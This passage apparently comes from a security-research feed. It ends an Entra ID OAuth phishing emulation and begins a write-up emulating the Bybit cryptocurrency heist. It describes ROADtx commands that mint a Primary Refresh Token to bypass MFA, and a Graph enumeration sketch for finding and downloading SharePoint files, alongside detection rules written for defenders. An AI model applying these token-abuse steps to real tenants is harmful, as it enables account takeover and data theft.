<p>But why go through all this? Why register a device, generate a cert, and obtain a PRT when we already had an access token, ID token, and refresh token?</p>
<p>Because the PRT is the key to full user and device identity emulation. Think of it as the Entra ID analogue of a Kerberos ticket-granting ticket: a token-granting token. With a valid PRT:</p>
<ul>
<li>An adversary can request new access and ID tokens for first-party apps like Outlook, SharePoint, or Teams without needing user interaction.</li>
<li>The PRT enables seamless single sign-on (SSO) across multiple services, bypassing MFA and other conditional access policies (CAP) that would typically re-prompt the user. This is crucial for persistence, as CAP and MFA are often significant barriers for adversaries.</li>
<li>It supports long-lived persistence, as the PRT can be silently renewed and leveraged across sessions as long as the device identity remains trusted.</li>
</ul>
<p>And perhaps most dangerously — the PRT allows adversaries to impersonate a fully compliant, domain-joined device and user combo, effectively bypassing most conventional detection and response controls and making the line between benign and suspicious extremely thin for hunters and analysts.</p>
<p>This makes the PRT an incredibly valuable asset, one that enables covert lateral movement, privilege escalation, and deep access to Microsoft 365 services. It’s not just about getting in anymore — it’s about staying undetected.</p>
<p>Let’s not forget post-compromise activity…</p>
<p>ROADtx offers a few powerful commands frequently used by adversaries – <em>prtenrich</em> and <em>browserprtauth</em>. For example, we can access most browser-based UI services in the Microsoft suite by supplying our PRT, which includes the necessary metadata for authentication and authorization – metadata that originally belonged to our phishing victim (me), but is actually the Microsoft Authentication Broker acting on their behalf.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image12.png" alt="Figure 11: Accessing M365 Copilot with PRT via “browserprtauth” command" /></p>
<p>Volexity also reported that following device registration and PRT acquisition, a 2FA request was sent to the initial victim, approved, and then used to access emails via SharePoint. While they do not specify exactly how these requests were made, it’s reasonable to assume the adversary used the PRT to authenticate via a first-party Microsoft client, with the actual data access happening through Microsoft Graph. Graph remains a popular target post-compromise because it serves as a central API hub for most Microsoft 365 resources.</p>
<p>To start, let’s leverage ROADtx to authenticate with our PRT, with Microsoft Teams as our client and Microsoft Graph as our resource. When using the <em>prtauth</em> command with our PRT, we are able to obtain a new access token and refresh token – clearly demonstrating the utility of the PRT as a token-granting token within Microsoft’s identity fabric.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image8.png" alt="Figure 12: “prtauth” command for tokens as MSFT Teams client for MSFT Graph resource" /></p>
<p>Once our access token is obtained, we plug it into a custom Python script to start enumerating our SharePoint sites, drives, and items, which allows us to identify files of interest and download their contents.</p>
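<p>The enumeration follows the documented Microsoft Graph v1.0 paths for SharePoint. The sketch below builds the authenticated requests; the control flow is our assumption, not the exact script used in the emulation, and the token is a placeholder.</p>

```python
# Illustrative Graph API request builder for SharePoint enumeration.
# Endpoint paths are the documented v1.0 routes; the token is a placeholder.
from urllib.request import Request

GRAPH = "https://graph.microsoft.com/v1.0"

def graph_request(access_token: str, path: str) -> Request:
    """Build an authenticated GET request against Microsoft Graph."""
    return Request(GRAPH + path, headers={"Authorization": f"Bearer {access_token}"})

# Enumeration order: sites -> drives (document libraries) -> items -> content
steps = [
    "/sites?search=*",                   # discover all SharePoint sites in tenant
    "/sites/{site-id}/drives",           # list drives for a discovered site
    "/drives/{drive-id}/root/children",  # list items, then download by item ID
]
req = graph_request("ACCESS_TOKEN", steps[0])
```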
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image6.png" alt="Figure 13: Discovering all SharePoint sites in tenant and downloading user files via MSFT Graph" /></p>
<p>With this emulation, we showed how adversaries can chain OAuth phishing with the Microsoft Authentication Broker to obtain the credential material needed for ROADtx to acquire a PRT. That PRT then becomes an important post-compromise utility for accessing sensitive files, enumerating tenant resources, and much more.</p>
<p>Now, let’s shift focus: what are plausible and accurate signals for detecting this activity?</p>
<h2>Detection</h2>
<h3>Signal 1 - Microsoft Entra ID OAuth Phishing as Microsoft Authentication Broker</h3>
<p>Identifies instances where a user principal initiates an OAuth authorization code flow using the Microsoft Authentication Broker (MAB) as the client and the Device Registration Service (DRS) as the target resource. This detection focuses on cases where a single session ID is reused across two or more distinct IP addresses within a short time window, and at least one request originates from a browser — behavior commonly associated with phishing.</p>
<pre><code>[ FROM logs-azure.signinlogs-* ]
        |
        |  ← Pulls all Microsoft Entra ID sign-in logs
        ↓
[ WHERE app_id == MAB AND resource_id == DRS ]
        |
        |  ← Filters to OAuth auth code requests targeting
        |     Microsoft Authentication Broker + Device Reg Service
        ↓
[ EVAL session_id + is_browser ]
        |
        |  ← Extracts session ID and flags browser-based activity
        ↓
[ STATS BY 30-minute window, user, session_id ]
        |
        |  ← Groups logins within same session and time window,
        |     then aggregates:
        |       - user/session/token identifiers
        |       - distinct IPs and geo info
        |       - user agent, browser presence
        |       - app/resource/client info
        ↓
[ WHERE ip_count ≥ 2 AND session_id_count == 1 ]
        |
        |  ← Identifies reuse of a single session ID
        |     across ≥ 2 different IP addresses
        ↓
[ AND has_browser ≥ 1 AND auth_count ≥ 2 ]
        |
        |  ← Requires at least one browser-based request
        |     and at least two total sign-in events
        ↓
[ Output = Suspicious OAuth Flow with Auth Broker for DRS ]

</code></pre>
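<p>The aggregation above can be modeled in plain Python for testing the logic offline. Field names are simplified stand-ins for the <em>azure.signinlogs</em> fields the production rule uses.</p>

```python
# Minimal model of Signal 1: within a 30-minute window, flag a session ID
# reused across two or more IPs with at least one browser-based request.
from collections import defaultdict
from datetime import datetime, timedelta

def suspicious_sessions(events, window=timedelta(minutes=30)):
    by_session = defaultdict(list)
    for e in events:
        by_session[(e["user"], e["session_id"])].append(e)
    flagged = set()
    for (_user, sid), evs in by_session.items():
        evs.sort(key=lambda e: e["time"])
        if evs[-1]["time"] - evs[0]["time"] > window:
            continue  # simplification: require all events inside one window
        ips = {e["ip"] for e in evs}
        if len(ips) >= 2 and len(evs) >= 2 and any(e["is_browser"] for e in evs):
            flagged.add(sid)
    return flagged

events = [
    {"user": "alice", "session_id": "s1", "ip": "1.2.3.4", "is_browser": True,
     "time": datetime(2025, 6, 25, 10, 0)},
    {"user": "alice", "session_id": "s1", "ip": "5.6.7.8", "is_browser": False,
     "time": datetime(2025, 6, 25, 10, 10)},
    {"user": "bob", "session_id": "s2", "ip": "9.9.9.9", "is_browser": True,
     "time": datetime(2025, 6, 25, 10, 0)},
]
flagged = suspicious_sessions(events)  # only s1 meets all conditions
```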
<h3>Signal 2 - Suspicious ADRS Token Request by Microsoft Auth Broker</h3>
<p>Identifies Microsoft Entra ID sign-in events where a user principal authenticates using a refresh token issued to the Microsoft Authentication Broker (MAB) client, targeting the Device Registration Service (DRS) with the <em>adrs_access</em> OAuth scope. This pattern may indicate token-based access to DRS following an initial authorization code phishing or device registration flow.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and azure.signinlogs.properties.app_id : &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot; and azure.signinlogs.properties.resource_id : &quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot; and azure.signinlogs.properties.authentication_processing_details.`Oauth Scope Info`: *adrs_access* and azure.signinlogs.properties.incoming_token_type: &quot;refreshToken&quot; and azure.signinlogs.properties.user_type: &quot;Member&quot;
</code></pre>
<h3>Signal 3 - Unusual Device Registration in Entra ID</h3>
<p>Detects a sequence of Entra ID audit log events indicating potential malicious device registration activity using a refresh token, commonly seen after OAuth phishing. This pattern mimics the behavior of tools like ROADtx, where a newly registered Windows device (with a hardcoded OS version 10.0.19041.928) is added by the Device Registration Service, followed by user and owner assignments. All events must share the same correlation ID and occur within a one-minute window, strongly suggesting automation or script-driven registration rather than legitimate user behavior.</p>
<pre><code>sequence by azure.correlation_id with maxspan=1m
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.identity == &quot;Device Registration Service&quot; and azure.auditlogs.operation_name == &quot;Add device&quot; and azure.auditlogs.properties.additional_details.value like &quot;Microsoft.OData.Client/*&quot; and (
  azure.auditlogs.properties.target_resources.`0`.modified_properties.`1`.display_name == &quot;CloudAccountEnabled&quot; and 
azure.auditlogs.properties.target_resources.`0`.modified_properties.`1`.new_value: &quot;[true]&quot;) and azure.auditlogs.properties.target_resources.`0`.modified_properties.`3`.new_value like &quot;*10.0.19041.928*&quot;]
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.operation_name == &quot;Add registered users to device&quot; and azure.auditlogs.properties.target_resources.`0`.modified_properties.`2`.new_value like &quot;*urn:ms-drs:enterpriseregistration.windows.net*&quot;]
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.operation_name == &quot;Add registered owner to device&quot;]
</code></pre>
<h3>Signal 4 - Entra ID RT to PRT Transition from Same User and Device</h3>
<p>This detection identifies when a Microsoft Entra ID user first authenticates using a refresh token issued to the Microsoft Authentication Broker (MAB), followed shortly by the use of a Primary Refresh Token (PRT) from the same device. This sequence is rare in normal user behavior and may indicate an adversary has successfully registered a device and escalated to persistent access using tools like ROADtx. By filtering out activity tied to the Device Registration Service (DRS) in the second step, the rule focuses on post-registration usage of the PRT to access other Microsoft 365 services.</p>
<p>This behavior strongly suggests token-based compromise and long-term session emulation, particularly when device trust is established silently. Catching this transition from refresh token to PRT is critical for surfacing high-fidelity signals of OAuth phishing and post-compromise persistence.</p>
<pre><code>sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.device_detail.device_id with maxspan=1d
  [authentication where 
    event.dataset == &quot;azure.signinlogs&quot; and
    azure.signinlogs.category == &quot;NonInteractiveUserSignInLogs&quot; and
    azure.signinlogs.properties.app_id == &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot; and
    azure.signinlogs.properties.incoming_token_type == &quot;refreshToken&quot; and
    azure.signinlogs.properties.device_detail.trust_type == &quot;Azure AD joined&quot; and
    azure.signinlogs.properties.device_detail.device_id != null and
    azure.signinlogs.properties.token_protection_status_details.sign_in_session_status == &quot;unbound&quot; and
    azure.signinlogs.properties.user_type == &quot;Member&quot; and
    azure.signinlogs.result_signature == &quot;SUCCESS&quot;
  ]
  [authentication where 
    event.dataset == &quot;azure.signinlogs&quot; and
    azure.signinlogs.properties.incoming_token_type == &quot;primaryRefreshToken&quot; and
    azure.signinlogs.properties.resource_display_name != &quot;Device Registration Service&quot; and
    azure.signinlogs.result_signature == &quot;SUCCESS&quot;
  ]
</code></pre>
<h3>Signal 5 - Unusual PRT Usage and Registered Device for User Principal</h3>
<p>This detection surfaces when a Microsoft Entra ID user registers a new device not previously seen within the last 7 days – behavior often associated with OAuth phishing campaigns that chain into ROADtx-based device registration. In these attacks, adversaries trick users into authorizing access for the Microsoft Authentication Broker (MAB) targeting the DRS, obtain an RT, and then use ROADtx to silently register a fake Windows device and mint a PRT. This rule alerts when a user principal authenticates from a newly observed device ID, particularly if the session is unbound, which is characteristic of token replay or device spoofing. Because PRTs require a registered and trusted device, this signal plays a critical role in identifying when an adversary has crossed from basic token abuse into persistent, stealthy access aligned with long-term compromise.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and
    event.category: &quot;authentication&quot; and
    azure.signinlogs.properties.user_type: &quot;Member&quot; and
    azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: &quot;unbound&quot; and
    not azure.signinlogs.properties.device_detail.device_id: &quot;&quot; and
    azure.signinlogs.properties.user_principal_name: *
</code></pre>
<p><a href="https://www.elastic.co/es/docs/solutions/security/detect-and-alert/about-detection-rules">New Terms</a> Values:</p>
<ul>
<li>azure.signinlogs.properties.user_principal_name</li>
<li>azure.signinlogs.properties.device_detail.device_id</li>
</ul>
<p>This emulation helped us validate the full attacker workflow – from phishing for consent to establishing device trust and minting a PRT for long-term persistence. By chaining OAuth abuse with device registration, adversaries can satisfy CAPs, impersonate compliant endpoints and move laterally through cloud environments – often without triggering traditional security controls.</p>
<p>These nuances matter. When viewed in isolation, individual events like token issuance or device registration may appear benign. But when correlated across sign-in logs, audit data and token metadata, they expose a distinct trail of identity compromise.</p>
<h1>Key Telemetry Details for Detection and Abuse</h1>
<p>Throughout our emulation and detection efforts, specific telemetry artifacts consistently proved essential for separating benign OAuth activity from malicious abuse. Understanding how these fields appear in Microsoft Entra ID logs – and how attackers manipulate them – is critical for effective hunting and detection engineering. From client IDs and grant types to device compliance, token types and conditional access outcomes, these signals tell the story of identity-based attacks. Below, we have curated a list of the most important fields and how they can enable us.</p>
<p><strong>Client Application IDs (client_id)</strong>: Identify the application initiating the OAuth request. First-party clients (e.g. VSCode, Auth Broker) can be abused to blend in. Third-party clients may be malicious or unreviewed - often representing consent grant attacks. Mainly used to identify risky or unexpected app usage.</p>
<p><strong>Target Resource (resource_id / resource_display_name)</strong>: Defines which MSFT service is being accessed (e.g. MSFT Graph or Teams). High value targets include – Graph API, SharePoint, Outlook, Teams and Directory Services. Resource targeting is often scoped by attacker objectives.</p>
<p><strong>Principal type (user_type)</strong>: Indicates if the sign-in was by a member (user) or service principal. Phishing campaigns almost always target member accounts. This enables easy filtering in detection logic and helps pair unusual first-party client requests with the user principals they act on behalf of.</p>
<p><strong>OAuth Grant Type (authentication_processing_details)</strong>: Key to understanding how the token was obtained – authorization codes, refresh tokens, device codes, client credentials, etc. Refresh token and device code reuse are high-fidelity signals of post-compromise activity.</p>
<p><strong>Geolocation</strong>: Enables us to identify atypical sign-ins (e.g. a rarely seen country) or impossible travel (the same user from distant locations in a short time). Combined with session IDs and correlation IDs, these can reveal token hijacking, post-compromise identity abuse, or lateral movement.</p>
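<p>The impossible travel heuristic mentioned above can be sketched with a great-circle distance check. The coordinates and speed threshold below are illustrative values, not the thresholds used in any Elastic rule.</p>

```python
# Sketch of an "impossible travel" check: compare consecutive sign-ins for a
# user and flag pairs whose implied speed exceeds a plausible threshold.
from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometers."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def impossible_travel(sign_ins, max_kmh=900):
    """sign_ins: time-ordered (hours, lat, lon) tuples for one user."""
    for (t1, la1, lo1), (t2, la2, lo2) in zip(sign_ins, sign_ins[1:]):
        hours = max(t2 - t1, 1e-6)  # avoid division by zero on same-time events
        if haversine_km(la1, lo1, la2, lo2) / hours > max_kmh:
            return True
    return False
```

<p>For example, two sign-ins one hour apart from New York and Moscow imply a speed of roughly 7,500 km/h, far beyond the threshold.</p>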
<p><strong>Device Metadata (device_detail, trust_type, compliance_state)</strong>: Includes Device IDs, operating system, trust types, compliance, managed-state and more. Device registration and PRT issuance are tied to this metadata. Often a goal for adversaries to satisfy CAP and gain trusted access that is persistent.</p>
<p><strong>Authentication Protocols and Types (authentication_protocol / incoming_token_type)</strong>: Reveals whether the session was OAuth-based or if MFA was used. The incoming token type identifies which token was presented for the request to provide authN or authZ. Useful for detecting token reuse and non-interactive sign-ins.</p>
<p><strong>Authentication Material and Session Context</strong>: Tokens used can be inferred via incoming token type, token protection status and the session ID. Session reuse, long session duration or multiple IPs tied to a single session often indicate abuse.</p>
<p><strong>Conditional Access Policy Status</strong>: Evaluated during token issuance, and heavily influences whether access is granted. This helps identify CAP evasion and unexpected policy outcomes, or can factor into risk scoring.</p>
<p><strong>Scopes and Consent Behavior</strong>: Requested scopes appear in the SCP or OAuth parameters captured in sign-in logs. Indicators of abuse include <em>offline_access</em>, <em>.default</em>, or broad scopes like <em>Mail.ReadWrite</em>. Consent telemetry can help pivot or correlate if the user approved a suspicious application.</p>
<h1>Conclusion</h1>
<p>Microsoft Entra ID’s OAuth implementation presents a double-edged sword: it enables powerful, seamless authentication experiences – but also exposes new opportunities for adversaries to exploit trust, session persistence and device registration attack paths.</p>
<p>By replicating the OAuth phishing techniques observed by Volexity, our team was able to validate how attackers abuse legitimate Microsoft applications, token flows, and open-source tools to gain stealthy access to sensitive data. We extended this work through hands-on emulation, diving deep into the mechanics of OAuth phishing and workflows, security token metadata and acquisition, helping surface behavioral indicators that defenders can detect.</p>
<p>Our findings reinforce a key point: OAuth abuse doesn’t rely on malware or code execution. It weaponizes identity, consent, and token reuse – making traditional security controls a challenge – and why log-based detection, correlation and behavioral analysis are so critical.</p>
<p>We hope the emulation artifacts, detection rules, and lessons shared here help defenders across the community better understand – and detect/hunt – this evolving class of cloud-based identity threats.</p>
<p>If you're using Elastic, we’ve open-sourced all the detection rules discussed in this blog to get you started. And if you're hunting in another SIEM, we encourage you to adapt the logic and adjust to your environment accordingly.</p>
<p>Identity is the new perimeter – and it’s time we treated it that way. Stay safe and happy hunting!</p>
<h1>Detection Rules</h1>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/d41a83059c78129b4e1337dca10b190b862ca0d2/rules/integrations/azure/initial_access_entra_graph_single_session_from_multiple_addresses.toml">Microsoft Entra ID Session Reuse with Suspicious Graph Access</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_oauth_phishing_via_vscode_client.toml">Microsoft Entra ID OAuth Phishing via Visual Studio Code Client</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3625b1b392e03aa7693a5b8251e7a5d3cfa53cce/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml">Suspicious Microsoft OAuth Flow via Auth Broker to DRS</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/6b6407df88319f466c6cc56147210635bba5eb01/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml">Suspicious ADRS Token Request by Microsoft Auth Broker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/43b0f0ada7e290bbbc0d4b1d53ed158e7bfbe75c/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml">Unusual Device Registration in Entra ID</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/a18c76fe84eedc00efd9a712e74a0877b1061550/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml">Entra ID RT to PRT Transition from Same User and Device</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml">Unusual Registered Device for User Principal</a></li>
</ul>
<h1>References:</h1>
<ul>
<li><a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/</a></li>
<li><a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/</a></li>
<li><a href="https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30">https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token">https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens">https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow">https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/scopes-oidc#the-default-scope">https://learn.microsoft.com/en-us/entra/identity-platform/scopes-oidc#the-default-scope</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/Security Labs Images 22.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Bit ByBit - emulation of the DPRK's largest cryptocurrency heist]]></title>
            <link>https://www.elastic.co/es/security-labs/bit-bybit</link>
            <guid>bit-bybit</guid>
            <pubDate>Tue, 06 May 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A high-fidelity emulation of the DPRK's largest cryptocurrency heist via a compromised macOS developer and AWS pivots.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<p>Key takeaways from this research:</p>
<ul>
<li>PyYAML deserialization was the initial access vector</li>
<li>The attack leveraged session token abuse and AWS lateral movement</li>
<li>Static site supply chain tampering</li>
<li>Docker-based stealth on macOS</li>
<li>End-to-end detection correlation with Elastic</li>
</ul>
<h2>Introduction</h2>
<p>On February 21, 2025, the crypto world was shaken when approximately 400,000 ETH vanished from Bybit — one of the industry’s largest cryptocurrency exchanges. Behind this incredible theft is believed to be North Korea’s elite cyber-offensive unit, referred to as <a href="https://www.ic3.gov/PSA/2025/PSA250226">TraderTraitor</a>. Exploiting a trusted vendor relationship with Safe{Wallet}, a multisig (multi-signature) wallet platform, TraderTraitor transformed a routine transaction into a billion-dollar heist. Supply chain targeting has become a hallmark of the DPRK’s cyber strategy, underpinning the regime’s theft of more than <a href="https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/">$6 billion</a> in cryptocurrency since 2017. In this article we’ll dissect this attack, carefully emulate its tactics within a controlled environment, and provide practical lessons to reinforce cybersecurity defenses using Elastic’s products and features.</p>
<p>Our emulation of this threat is based on research released by <a href="https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/">Sygnia</a>, <a href="https://x.com/safe/status/1897663514975649938">Mandiant/SAFE</a>, <a href="https://slowmist.medium.com/cryptocurrency-apt-intelligence-unveiling-lazarus-groups-intrusion-techniques-a1a6efda7d34">SlowMist</a>, and <a href="https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/">Unit42</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image12.png" alt="" /></p>
<h2>Chronology of events</h2>
<p>If you're here for the technical emulation details, feel free to skip ahead. But for context — and to clarify what was officially reported — we've compiled a high-level timeline of events to ground our assumptions based on the research referenced above.</p>
<p><strong>February 2, 2025</strong> – Infrastructure Setup</p>
<p>The attacker registers the domain getstockprice[.]com via Namecheap. This infrastructure is later used as the C2 endpoint in the initial access payload.</p>
<p><strong>February 4, 2025</strong> – Initial Compromise</p>
<p>Developer1’s macOS workstation is compromised after executing a malicious Python application. This application contained Docker-related logic and referenced the attacker’s domain. The file path (<code>~/Downloads/</code>) and malware behavior suggest social engineering (likely via Telegram or Discord, consistent with past <a href="https://www.elastic.co/es/security-labs/elastic-catches-dprk-passing-out-kandykorn">REF7001</a> and UNC4899 tradecraft).</p>
<p><strong>February 5, 2025</strong> – AWS Intrusion Begins</p>
<p>The attacker successfully accesses Safe{Wallet}’s AWS environment using Developer1’s active AWS session tokens. The attacker then attempts (unsuccessfully) to register their own virtual MFA device to Developer1’s IAM user, indicating a persistence attempt.</p>
<p><strong>February 5–17</strong>: Reconnaissance activity begins within the AWS environment. During this time, attacker actions likely included the enumeration of IAM roles, S3 buckets, and other cloud assets.</p>
<p><strong>February 17, 2025</strong> – AWS Command and Control Activity</p>
<p>Confirmed C2 traffic observed in AWS. This marks the shift from passive reconnaissance to active staging of the attack.</p>
<p><strong>February 19, 2025</strong> – Web Application Tampering</p>
<p>A snapshot of app.safe.global (Safe{Wallet}’s statically hosted Next.js web app) captured by the Wayback Machine shows the presence of malicious JavaScript. The payload was crafted to detect a Bybit multisig transaction and modify it on-the-fly, redirecting funds to the attacker’s wallet.</p>
<p><strong>February 21, 2025</strong> – Execution and Cleanup</p>
<p>The exploit transaction is executed against Bybit via the compromised Safe{Wallet} frontend.</p>
<p>A new Wayback Machine snapshot confirms the JavaScript payload has been removed—indicating the attacker manually scrubbed it post-execution.</p>
<p>The Bybit heist transaction is finalized. Approximately 400,000 ETH is stolen. Subsequent analysis by Sygnia and others confirms that Bybit infrastructure was not directly compromised—Safe{Wallet} was the sole point of failure.</p>
<h2>Assumptions for emulation</h2>
<ul>
<li>Initial Social Engineering Vector:
Social engineering was employed to compromise Developer1, resulting in the execution of a malicious Python script. The exact details of the social engineering tactic (such as specific messaging, impersonation techniques, or the communication platform used) remain unknown.</li>
<li>Loader and Second-Stage Payload:
The malicious Python script executed a second-stage loader. It is currently unclear whether this loader and subsequent payloads match those detailed in Unit42's reporting, despite alignment in the initial access Python application's characteristics.</li>
<li>Safe Application Structure and Workflow:
The compromised application (<code>app.safe.global</code>) appears to be a Next.js application hosted statically in AWS S3. However, specific details such as its exact routes, components, development processes, version control methods, and production deployment workflow are unknown.</li>
<li>JavaScript Payload Deployment:
While attackers injected malicious JavaScript into the Safe{Wallet} application, it is unclear whether this involved rebuilding and redeploying the entire application or merely overwriting/modifying a specific JavaScript file.</li>
<li>AWS IAM and Identity Management Details:
Details regarding Developer1’s IAM permissions, roles, and policy configurations within AWS are unknown. Additionally, whether Safe{Wallet} used AWS IAM Identity Center or alternative identity management solutions remains unclear.</li>
<li>AWS Session Token Retrieval and Usage:
While reports confirm the attackers used temporary AWS session tokens, details about how Developer1 originally retrieved these tokens (such as through AWS SSO, <code>GetSessionToken</code>, or specific MFA configurations) and how they were subsequently stored or utilized (e.g., environment variables, AWS config files, custom scripts) are unknown.</li>
<li>AWS Enumeration and Exploitation Techniques:
The exact tools, enumeration methodologies, AWS API calls, and specific actions carried out by attackers within the AWS environment between February 5 and February 17, 2025, remain undisclosed.</li>
<li>AWS Persistence Mechanisms:
Although there is an indication of potential persistence within AWS infrastructure (e.g., via EC2 instance compromise), explicit details including tools, tactics, or persistence methods are not provided.</li>
</ul>
<h2>Overview of the attack</h2>
<p>Targeting companies within the crypto ecosystem is a common occurrence. DPRK continually targets these companies due to the relative anonymity and decentralized nature of cryptocurrency, enabling the regime to evade global financial sanctions. North Korea's offensive cyber groups excel at identifying and exploiting vulnerabilities, resulting in billions of dollars in losses.</p>
<p>This intrusion began with the <a href="https://x.com/safe/status/1897663514975649938?s=09">targeted compromise</a> of a developer's macOS workstation at Safe{Wallet}, ByBit’s trusted multi-signature wallet provider. Initial access involved social engineering: based on previous campaigns, the operators likely approached the developer via platforms such as LinkedIn, Telegram, or Discord and convinced them to download an archive file containing a crypto-themed Python application, an initial access procedure favored by DPRK. The application also included a Dockerized version that could be run inside a privileged container. Unknown to the developer, this seemingly benign application enabled DPRK operators to exploit a remote code execution (RCE) <a href="https://www.cvedetails.com/cve/CVE-2017-18342/">vulnerability</a> in the PyYAML library, providing code execution and, subsequently, control over the host system.</p>
<p>After gaining initial access to the developer's machine, attackers deployed <a href="https://github.com/its-a-feature/Mythic">Mythic C2</a>'s <a href="https://github.com/MythicAgents/poseidon">Poseidon agent</a>, a robust Golang-based payload offering advanced stealth and extensive post-exploitation capabilities for macOS environments. The attackers may then have conducted reconnaissance, discovering the developer's access to Safe{Wallet}’s AWS environment and the use of temporary AWS user session tokens secured via multi-factor authentication (MFA). Armed with the developer's AWS access key ID, secret key, and temporary session token, the threat actors authenticated into Safe{Wallet}’s AWS environment within approximately 24 hours, capitalizing on the 12-hour validity of the session tokens.</p>
<p>Attempting to ensure persistent access to the AWS environment, the attackers tried to register their own MFA device. However, AWS temporary session tokens do not permit IAM API calls without <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#:~:text=You%20cannot%20call%20any%20IAM,in%20the%20IAM%20User%20Guide">MFA authentication context</a>, causing this attempt to fail. Following this minor setback, the threat actor enumerated the AWS environment, eventually discovering an S3 bucket hosting Safe{Wallet}'s static Next.js user interface.</p>
<p>The attackers could then have downloaded this Next.js application’s bundled code, spending nearly two weeks analyzing its functionality before injecting malicious JavaScript into the primary JS file and overwriting the legitimate version hosted in the S3 bucket. The malicious JavaScript code was activated exclusively on transactions initiated from Bybit’s cold wallet address and an attacker-controlled address. By inserting hardcoded parameters, the script circumvented transaction validation checks and digital signature verifications, effectively deceiving ByBit wallet approvers who implicitly trusted the Safe{Wallet} interface.</p>
<p>Shortly thereafter, the DPRK initiated a fraudulent transaction, triggering the malicious script to alter transaction details. This manipulation likely misled the wallet signers into approving the illicit transfer, granting DPRK operatives control of approximately 400,000 ETH. These stolen funds were then laundered into attacker-controlled wallets.</p>
<p>We chose to end our research and behavior emulation at the compromise of the Next.js application. Thus, we do not dive into the blockchain technologies, such as ETH smart contracts, contract addresses, and sweep ETH calls discussed in several other research publications.</p>
<h2>Emulating the attack</h2>
<p>To truly understand this breach, we decided to emulate the entire attack chain in a controlled lab environment. As security researchers at Elastic, we wanted to walk in the footsteps of the attacker to understand how this operation unfolded at each stage: from code execution to AWS session hijacking and browser-based transaction manipulation.</p>
<p>This hands-on emulation served a dual purpose. First, it allowed us to analyze the attack at a granular, technical level to uncover practical detection and prevention opportunities. Second, it gave us the chance to test Elastic’s capabilities end-to-end—to see whether our platform could not only detect each phase of the attack, but also correlate them into a cohesive narrative that defenders could act on.</p>
<h3>macOS endpoint compromise</h3>
<p>Thanks to <a href="https://unit42.paloaltonetworks.com/">Unit42</a>’s detailed write-up, and more critically their upload of recovered samples to VirusTotal, we were able to emulate the attack end-to-end using the actual payloads observed in the wild. This included:</p>
<ul>
<li>PyYAML deserialization payload</li>
<li>Python loader script</li>
<li>Python stealer script</li>
</ul>
<h4>Malicious Python Application</h4>
<p>The initial access Python application we used in our emulation aligns with samples highlighted and shared by <a href="https://www.slowmist.com/">SlowMist</a> and corroborated by Mandiant's <a href="https://x.com/safe/status/1897663514975649938">incident response findings</a> from the SAFE developer compromise. This application also matched the directory structure of the application shown by Unit42 in their write-up. Attackers forked a legitimate stock-trading Python project from GitHub and backdoored it within a Python script named <code>data_fetcher.py</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image13.png" alt="Python Application Directory Structure" /></p>
